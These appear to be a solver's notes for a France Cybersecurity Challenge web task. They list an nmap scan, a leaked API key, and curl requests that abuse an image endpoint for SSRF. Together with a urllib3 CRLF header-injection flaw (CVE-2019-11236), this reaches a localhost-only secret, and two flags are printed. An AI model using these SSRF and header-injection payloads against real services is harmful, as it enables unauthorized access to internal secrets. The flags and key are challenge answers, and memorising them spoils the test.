source code -> /api/debug -> /baguettevpn_server_app_v0.py

FCSC{e5e3234f8dae908461c6ee777ee329a2c5ab3b1a8b277ff2ae288743bbc6d880}

/api/secret?X-API-KEY=b99cc420eb25205168e83190bae48a12
+ change host to 127.0.0.1 on burp
-> not enough

nmap -p 0-2000 91.134.128.136 -A

0/tcp  filtered unknown
25/tcp filtered smtp
80/tcp open     http-proxy HAProxy http proxy 1.3.1 or later
|_http-title: Error 503: server unavailable

http://challenges2.france-cybersecurity-challenge.fr:5002/api/image?fn=/
in requirements -> urllib3==1.24.2 -> CVE-2019-11236

curl 'http://challenges2.france-cybersecurity-challenge.fr:5002/api/image?fn=@127.0.0.1:5002/api/secret'

http://challenges2.france-cybersecurity-challenge.fr:5002/api/image ->
GET http://baguette-vpn-cdn@127.0.0.1:5002/api/secret

curl 'http://challenges2.france-cybersecurity-challenge.fr:5002/api/image?fn=@localhost:1337/api/secret

@localhost:1337/api/secret HTTP/1.1
Host: challenges2.france-cybersecurity-challenge.fr:5002
User-Agent: curl/7.74.0
Accept: */*
Connection: close
X-API-KEY: b99cc420eb25205168e83190bae48a12
Trash:

FCSC{6e86560231bae31b04948823e8d56fac5f1704aaeecf72b0c03bfe742d59fdfb}
